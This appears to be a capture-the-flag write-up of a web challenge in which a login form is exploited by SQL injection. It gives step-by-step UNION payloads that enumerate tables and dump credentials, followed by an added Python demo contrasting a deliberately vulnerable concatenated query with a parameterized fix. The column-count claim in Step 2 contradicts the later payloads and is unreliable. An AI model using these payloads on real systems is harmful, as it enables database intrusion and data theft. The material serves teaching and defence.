HackDay - Web
SQL Injection and Sensitive Data Retrieval
In this challenge, we are given a form with two fields: username and password. Our goal is to exploit a SQL Injection vulnerability to extract sensitive data from the database.
Step 1: Testing Basic Injection
I started by testing a simple SQL injection in the password field. Here’s the payload I used:
username=admin&password='OR''='
Result: The server returns a list of users present in the database:
Step 2: Determining the Number of Columns
Next, I tried to determine the number of columns required for a valid SQL query. I used the following payload:
username=admin&password=' UNION SELECT null, null, null, null, null, null --
This returned an error, indicating that 5 columns are needed for a valid injection.
Step 3: Retrieving Database Version
With the correct number of columns, I used a payload to retrieve the database version:
username=a&password=' UNION SELECT 1, @@version, 3-- -
Result:
This indicates the database is running MySQL version 5.7.44.
Step 4: Listing Tables
To list the available tables in the database, I used the following payload:
username=a&password=' UNION SELECT 1, TABLE_NAME, 3 FROM INFORMATION_SCHEMA.TABLES-- -
Result:
Step 5: Listing Columns in a Table
Once I identified the blueprints table, I listed its columns using this payload:
username=a&password=' UNION SELECT 1, COLUMN_NAME, 3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='blueprints'-- -
Result:
Step 6: Extracting Data from the Table
I then extracted data from the blueprints table by combining the columns:
username=a&password=' UNION SELECT id, CONCAT(username, ':', password, ':', is_encrypted, ':', file_name, ':', description), 3 FROM blueprints--
Result:
Step 7: Decoding the Data
Upon closer inspection, I found an interesting string associated with the file secret_key.txt:
W5HWRxWbZM7AUhxgfRwZg58ANQFKgMwutG
By decoding it in Base58, I found the flag.
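Why the payloads above reach the database, and the fix, as an added example that is not part of the original write-up or the challenge's code. It assumes the login handler builds its query by string concatenation; SQLite stands in for MySQL, and the schema, sample rows and function names are hypothetical.

```python
import sqlite3

# Payload from Step 1, and a UNION payload adapted to the assumed schema below.
OR_PAYLOAD = "'OR''='"
UNION_PAYLOAD = "' UNION SELECT id, file_name, 3 FROM blueprints-- -"

def make_db():
    # Constructed sample data; table layout is an assumption, not the challenge's.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'alice', 'hunter2');
        CREATE TABLE blueprints (id INTEGER, file_name TEXT, description TEXT);
        INSERT INTO blueprints VALUES (1, 'secret_key.txt', 'constructed-value');
    """)
    return db

def login_vulnerable(db, username, password):
    # Input is pasted into the SQL text, so a quote in it closes the string
    # literal and everything after it is parsed as SQL.
    query = ("SELECT id, username, password FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(query).fetchall()

def login_parameterized(db, username, password):
    # Placeholders keep the input as data: the driver binds it as a value
    # after the statement has been parsed, so quotes have no special meaning.
    query = ("SELECT id, username, password FROM users "
             "WHERE username = ? AND password = ?")
    return db.execute(query, (username, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for name, pw in [("admin", OR_PAYLOAD), ("a", UNION_PAYLOAD)]:
        print("input      :", pw)
        print("  concatenated :", login_vulnerable(db, name, pw))
        print("  parameterized:", login_parameterized(db, name, pw))
```

With bound parameters, both inputs are compared as literal password strings and match no row, while a correct password still logs in.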